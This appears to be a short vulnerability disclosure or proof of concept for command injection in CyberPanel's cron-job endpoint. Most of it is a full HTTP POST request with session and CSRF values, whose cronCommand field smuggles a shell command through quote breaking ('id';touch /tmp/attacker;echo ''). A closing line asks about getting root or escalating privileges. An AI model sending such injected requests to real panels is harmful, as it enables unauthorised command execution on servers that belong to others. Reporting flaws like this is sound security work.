HTTP REQUEST
POST /websites/addNewCron HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 137
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=UTF-8
Origin: https://HOST:8090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://HOST:8090/websites/listCron
Accept-Encoding: gzip, deflate
Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Cookie: csrftoken=MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ; django_language=tr; sessionid=zl41ugsc1evv58eut8xmq8vk2eb0vjze
sec-gpc: 1
{"domain":"attacker.com","minute":"*","hour":"*","monthday":"*","month":"*","weekday":"*","cronCommand":"id';touch /tmp/attacker;echo '"}
affected parameter : cronCommand
We can not filter this parameter due to the nature of this function, although this command runs at user level as you can see here -> https://github.com/usmannasir/cyberpanel/blob/270889bdec10b7804be21ebfa487eeedfd941e5e/websiteFunctions/website.py#L1549
Are you able to get root or escalate the privileges?